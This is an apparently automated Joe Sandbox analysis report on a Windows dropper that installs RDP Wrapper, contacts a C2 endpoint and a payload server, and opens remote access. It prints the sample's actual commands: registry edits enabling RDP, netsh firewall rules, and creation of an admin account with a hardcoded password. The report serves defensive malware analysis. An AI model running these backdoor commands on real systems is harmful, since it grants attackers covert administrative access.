                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: net1.exe, 0000001C.00000002.2443440527.00000000033C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V AdministratorsIIS_IUSRSNetwork Configuration OperatorsPerformance Log UsersPerformance Monitor UsersPower UsersRemote Desktop UsersRemote Management UsersReplicatorSystem Managed Accounts GroupUsers,
                            Source: file.exe, 00000000.00000002.2500984157.0000000003675000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2500984157.0000000003672000.00000004.00000800.00020000.00000000.sdmp, net1.exe, 0000001C.00000002.2443440527.00000000033C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *Hyper-V Administrators
                            Source: file.exe, 00000000.00000002.2500494364.0000000001639000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: net1.exe, 0000001C.00000002.2443440527.00000000033C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Administrators
                            Source: C:\Windows\System32\drivers\tsusbhub.sysSystem information queried: ModuleInformationJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "AllowRemoteRPC" /t REG_DWORD /d 1 /fJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRemoteDesktop" /t REG_DWORD /d 0 /fJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -iJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "AllowRemoteRPC" /t REG_DWORD /d 1 /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRemoteDesktop" /t REG_DWORD /d 0 /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -iJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allowJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net user BoydKrajcik hDNQhfjKM9S0 /addJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user BoydKrajcik hDNQhfjKM9S0 /addJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroupJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroupJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Remote Desktop Users" BoydKrajcik /addJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Remote Desktop Users" BoydKrajcik /addJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" BoydKrajcik /addJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" BoydKrajcik /addJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,10_2_004093C0
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,10_2_00408908
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: GetLocaleInfoW,10_2_00412C4A
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: GetLocaleInfoW,10_2_00412C4C
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: GetLocaleInfoW,10_2_00412C98
                            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_00411154 GetLocalTime,10_2_00411154
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_00414698 GetVersionExW,10_2_00414698
                            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Lowering of HIPS / PFW / Operating System Security Settings

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow

                            Remote Access Functionality

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\Licensing Core EnableConcurrentSessionsJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server fDenyTSConnectionsJump to behavior
                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire InfrastructureValid Accounts111
                            Windows Management Instrumentation
                            1
                            LSASS Driver
                            1
                            LSASS Driver
                            21
                            Disable or Modify Tools
                            OS Credential Dumping1
                            System Time Discovery
                            2
                            Remote Desktop Protocol
                            1
                            Archive Collected Data
                            12
                            Ingress Tool Transfer
                            Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts12
                            Command and Scripting Interpreter
                            1
                            DLL Side-Loading
                            1
                            DLL Side-Loading
                            1
                            Deobfuscate/Decode Files or Information
                            LSASS Memory1
                            System Service Discovery
                            Remote Desktop ProtocolData from Removable Media11
                            Encrypted Channel
                            Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts2
                            Service Execution
                            1
                            Create Account
                            1
                            Access Token Manipulation
                            21
                            Obfuscated Files or Information
                            Security Account Manager2
                            File and Directory Discovery
                            SMB/Windows Admin SharesData from Network Shared Drive1
                            Non-Standard Port
                            Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCron21
                            Windows Service
                            21
                            Windows Service
                            1
                            Timestomp
                            NTDS128
                            System Information Discovery
                            Distributed Component Object ModelInput Capture3
                            Non-Application Layer Protocol
                            Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
                            Process Injection
                            1
                            DLL Side-Loading
                            LSA Secrets211
                            Security Software Discovery
                            SSHKeylogging14
                            Application Layer Protocol
                            Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
                            Masquerading
                            Cached Domain Credentials141
                            Virtualization/Sandbox Evasion
                            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                            Modify Registry
                            DCSync1
                            Application Window Discovery
                            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                            Virtualization/Sandbox Evasion
                            Proc Filesystem1
                            System Network Configuration Discovery
                            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                            Access Token Manipulation
                            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
                            Process Injection
                            Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524989 Sample: file.exe Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 67 hansgborn.eu 2->67 69 api.ipify.org 2->69 77 Antivirus / Scanner detection for submitted sample 2->77 79 Multi AV Scanner detection for dropped file 2->79 81 Machine Learning detection for sample 2->81 83 7 other signatures 2->83 9 file.exe 15 3 2->9         started        14 rdpdr.sys 8 2->14         started        16 rdpvideominiport.sys 4 2->16         started        18 tsusbhub.sys 3 2->18         started        signatures3 process4 dnsIp5 71 8.46.123.33, 3389, 49714 AS-PUBMATICUS United States 9->71 73 147.45.44.104, 49704, 80 FREE-NET-ASFREEnetEU Russian Federation 9->73 75 3 other IPs or domains 9->75 59 C:\Users\user\AppData\Local\...\RDPWInst.exe, PE32 9->59 dropped 61 C:\Users\user\AppData\Local\...\file.exe.log, CSV 9->61 dropped 89 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 9->89 20 cmd.exe 1 9->20         started        22 cmd.exe 1 9->22         started        25 cmd.exe 1 9->25         started        27 5 other processes 9->27 file6 signatures7 process8 signatures9 29 RDPWInst.exe 2 5 20->29         started        33 conhost.exe 20->33         started        85 Uses cmd line tools excessively to alter registry or file data 22->85 87 Adds a new user with administrator rights 22->87 45 2 other processes 22->45 35 net.exe 1 25->35         started        37 conhost.exe 25->37         started        39 net.exe 1 27->39         started        41 net.exe 1 27->41         started        43 net.exe 1 27->43         started        47 7 other processes 27->47 process10 file11 63 C:\Program Files\RDP Wrapper\rdpwrap.dll, PE32+ 29->63 dropped 65 C:\Windows\System32\rfxvmt.dll, PE32+ 29->65 dropped 91 Multi AV Scanner detection for dropped file 29->91 93 Machine Learning detection for dropped file 29->93 95 Uses netsh to modify the Windows network and firewall settings 29->95 97 3 other signatures 29->97 49 netsh.exe 2 29->49         started        51 net1.exe 1 35->51         started        53 net1.exe 1 39->53         started        55 net1.exe 1 41->55         started        57 net1.exe 1 43->57         started        signatures12 process13

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand
                            SourceDetectionScannerLabelLink
                            file.exe100%AviraTR/Dropper.Gen
                            file.exe100%Joe Sandbox ML
                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Local\Temp\RDPWInst.exe100%Joe Sandbox ML
                            C:\Program Files\RDP Wrapper\rdpwrap.dll54%ReversingLabsWin64.PUA.RDPWrapper
                            C:\Users\user\AppData\Local\Temp\RDPWInst.exe68%ReversingLabsWin32.PUA.RDPWrap
                            C:\Windows\System32\rfxvmt.dll0%ReversingLabs
                            No Antivirus matches
                            No Antivirus matches
                            SourceDetectionScannerLabelLink
                            http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                            http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                            NameIPActiveMaliciousAntivirus DetectionReputation
                            hansgborn.eu
                            188.114.97.3
                            truefalse
                              unknown
                              api.ipify.org
                              104.26.12.205
                              truefalse
                                unknown
                                NameMaliciousAntivirus DetectionReputation
                                http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exefalse
                                  unknown
                                  https://hansgborn.eu/core/receive.phpfalse
                                    unknown
                                    http://api.ipify.org/false
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://github.com/bchavez/Bogus.file.exe, 00000000.00000002.2503746431.0000000005770000.00000004.08000000.00040000.00000000.sdmpfalse
                                        unknown
                                        http://www.apache.org/licenses/LICENSE-2.0RDPWInst.exe, 0000000A.00000000.2105035619.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.drfalse
                                          unknown
                                          http://api.ipify.orgdfile.exe, 00000000.00000002.2500984157.000000000367A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2500984157.0000000003682000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            https://github.com/bchavez/Bogus/issues/54file.exe, 00000000.00000002.2503746431.0000000005770000.00000004.08000000.00040000.00000000.sdmpfalse
                                              unknown
                                              https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniURDPWInst.exe, 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.drfalse
                                                unknown
                                                http://schemas.xmlsoap.org/soap/encoding/file.exe, 00000000.00000002.2507908437.0000000007A40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2500379278.0000000001602000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.apache.org/licenses/RDPWInst.exe, 0000000A.00000000.2105035619.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.drfalse
                                                  unknown
                                                  https://cloudflare-ipfs.com/ipfs/Qmd3W5DuhgHirLHGVixi6V76LhCkZUz6pnFt5AJBiyvHye/avatar/file.exe, 00000000.00000002.2503746431.0000000005770000.00000004.08000000.00040000.00000000.sdmpfalse
                                                    unknown
                                                    https://github.com/lontivero/Open.Nat/issuesOAlsofile.exe, 00000000.00000002.2507908437.0000000007A40000.00000004.08000000.00040000.00000000.sdmpfalse
                                                      unknown
                                                      https://loremflickr.comfile.exe, 00000000.00000002.2503746431.0000000005770000.00000004.08000000.00040000.00000000.sdmpfalse
                                                        unknown
                                                        http://schemas.xmlsoap.org/soap/envelope/file.exe, 00000000.00000002.2507908437.0000000007A40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2500379278.0000000001602000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniRDPWInst.exefalse
                                                          unknown
                                                          http://hansgborn.eudfile.exe, 00000000.00000002.2500984157.0000000003688000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://picsum.photosfile.exe, 00000000.00000002.2503746431.0000000005770000.00000004.08000000.00040000.00000000.sdmpfalse
                                                              unknown
                                                              https://placeimg.comfile.exe, 00000000.00000002.2503746431.0000000005770000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                unknown
                                                                https://hansgborn.eufile.exe, 00000000.00000002.2500984157.0000000003688000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://github.com/bchavez/Bogus/issues/115file.exe, 00000000.00000002.2503746431.0000000005770000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://api.ipify.orgfile.exefalse
                                                                      unknown
                                                                      http://stascorp.com/load/1-1-0-62RDPWInst.exe, RDPWInst.exe, 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.drfalse
                                                                        unknown
                                                                        http://stascorp.comDVarFileInfo$file.exe, 00000000.00000002.2500984157.00000000035EC000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 0000000A.00000000.2105035619.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr, rdpwrap.dll.10.drfalse
                                                                          unknown
                                                                          https://github.com/bchavez/Bogus/wiki/Bogus-Premiumfile.exe, 00000000.00000002.2503746431.0000000005770000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://hansgborn.eufile.exe, 00000000.00000002.2500984157.0000000003688000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://github.com/bchavez/Bogusfile.exe, 00000000.00000002.2503746431.0000000005770000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://via.placeholder.com/file.exe, 00000000.00000002.2503746431.0000000005770000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://hansgborn.eu/core/receive.phpdfile.exe, 00000000.00000002.2500984157.0000000003688000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://147.45.44.104file.exe, 00000000.00000002.2500984157.00000000035DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://github.com/bchavez/Bogus:file.exe, 00000000.00000002.2503746431.0000000005770000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefile.exe, 00000000.00000002.2500984157.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        104.26.12.205
                                                                                        api.ipify.orgUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        239.255.255.250
                                                                                        unknownReserved
                                                                                        unknownunknownfalse
                                                                                        188.114.97.3
                                                                                        hansgborn.euEuropean Union
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        8.46.123.33
                                                                                        unknownUnited States
                                                                                        62713AS-PUBMATICUStrue
                                                                                        147.45.44.104
                                                                                        unknownRussian Federation
                                                                                        2895FREE-NET-ASFREEnetEUfalse
                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1524989
                                                                                        Start date and time:2024-10-03 15:06:11 +02:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 7m 2s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:38
                                                                                        Number of new started drivers analysed:3
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:file.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.spre.troj.evad.winEXE@46/9@2/5
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 95%
                                                                                        • Number of executed functions: 114
                                                                                        • Number of non-executed functions: 68
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: file.exe
                                                                                        TimeTypeDescription
                                                                                        09:07:46API Interceptor1x Sleep call for process: file.exe modified
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        104.26.12.205file.exeGet hashmaliciousUnknownBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                        • api.ipify.org/
                                                                                        Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                                                                        • api.ipify.org/
                                                                                        2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                        • api.ipify.org/
                                                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                        • api.ipify.org/
                                                                                        239.255.255.250https://docs.google.com/forms/d/e/1FAIpQLSd11N0abxlW-jWhsgCqQSv4dirOC7CnOJxj0NYrOSmFOvEaMg/viewform?usp=pp_urlGet hashmaliciousHTMLPhisherBrowse
                                                                                          http://Warehousingpro.comGet hashmaliciousUnknownBrowse
                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                Stager.exeGet hashmaliciousUnknownBrowse
                                                                                                  file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                    https://trello.com/c/HA4sCE32Get hashmaliciousHTMLPhisherBrowse
                                                                                                      https://drmerp.com/bWFpbEBrc2xhdy5jby51aw==&xBvSo7gjDRPy&hmr&x-ad-vt-unk&OC305935Get hashmaliciousHTMLPhisherBrowse
                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                            188.114.97.3QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • filetransfer.io/data-package/758bYd86/download
                                                                                                            QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                            • filetransfer.io/data-package/58PSl7si/download
                                                                                                            QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                            • filetransfer.io/data-package/58PSl7si/download
                                                                                                            payment copy.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.cc101.pro/0r21/
                                                                                                            BX7yRz7XqF.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                            • cloud.dellicon.top/1000/500/
                                                                                                            jKSjtQ8W7O.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                            • ministryofficedownloadcloudserver.screenpont.xyz/78/CKP/
                                                                                                            Shipping Documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.rtprajalojago.live/7vun/
                                                                                                            inject.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                                            • joxi.net/4Ak49WQH0GE3Nr.mp3
                                                                                                            http://meta.case-page-appeal.eu/community-standard/208273899187123/Get hashmaliciousUnknownBrowse
                                                                                                            • meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
                                                                                                            9q24V7OSys.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.kzeconomy.top/bopi/?-Z_XO=6kwaqb6m5omublBEUG6Q6qPKP5yOZjcuHwr6+9T02/Tvpmf8nJuTPpmClij6fvBBwm3b&zxltAx=RdCtqlAhlNvlRVfP
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            hansgborn.eufile.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                            • 188.114.97.3
                                                                                                            file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                            • 188.114.97.3
                                                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                            • 188.114.97.3
                                                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                            • 188.114.96.3
                                                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                                                            • 188.114.97.3
                                                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                            • 188.114.96.3
                                                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                            • 188.114.96.3
                                                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                            • 188.114.96.3
                                                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                            • 188.114.97.3
                                                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                                                            • 188.114.97.3
                                                                                                            api.ipify.orgQUOTATIONS#08670.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                                            • 104.26.12.205
                                                                                                            08(2)_00.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 104.26.12.205
                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 104.26.13.205
                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 104.26.12.205
                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 104.26.12.205
                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 172.67.74.152
                                                                                                            PO-A1702108.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                            • 172.67.74.152
                                                                                                            AvQTFKdsST.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 104.26.13.205
                                                                                                            file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                            • 104.26.12.205
                                                                                                            z92BankPayment38_735.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 104.26.12.205
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            CLOUDFLARENETUSLVcCI.exeGet hashmaliciousQuasarBrowse
                                                                                                            • 1.1.1.1
                                                                                                            http://Warehousingpro.comGet hashmaliciousUnknownBrowse
                                                                                                            • 1.1.1.1
                                                                                                            QUOTATIONS#08670.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                                            • 104.26.12.205
                                                                                                            https://trello.com/c/HA4sCE32Get hashmaliciousHTMLPhisherBrowse
                                                                                                            • 104.18.36.155
                                                                                                            https://drmerp.com/bWFpbEBrc2xhdy5jby51aw==&xBvSo7gjDRPy&hmr&x-ad-vt-unk&OC305935Get hashmaliciousHTMLPhisherBrowse
                                                                                                            • 104.18.95.41
                                                                                                            phish_alert_sp2_2.0.0.0.emlGet hashmaliciousPhisherBrowse
                                                                                                            • 104.22.72.81
                                                                                                            http://arcor.cfdGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 104.17.25.14
                                                                                                            Message_2484922.emlGet hashmaliciousUnknownBrowse
                                                                                                            • 1.1.1.1
                                                                                                            http://arcor.cfd#warszawa@psgaz.plGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 104.17.25.14
                                                                                                            https://terryatchison-my.sharepoint.com/:f:/g/personal/terry_terryatchison_com_au/ElPLLTBYg_xBi3psE6F6HW0BDiAPLHOUdwoTRpPTGgsocg?e=hlVHMOGet hashmaliciousUnknownBrowse
                                                                                                            • 104.17.25.14
                                                                                                            CLOUDFLARENETUSLVcCI.exeGet hashmaliciousQuasarBrowse
                                                                                                            • 1.1.1.1
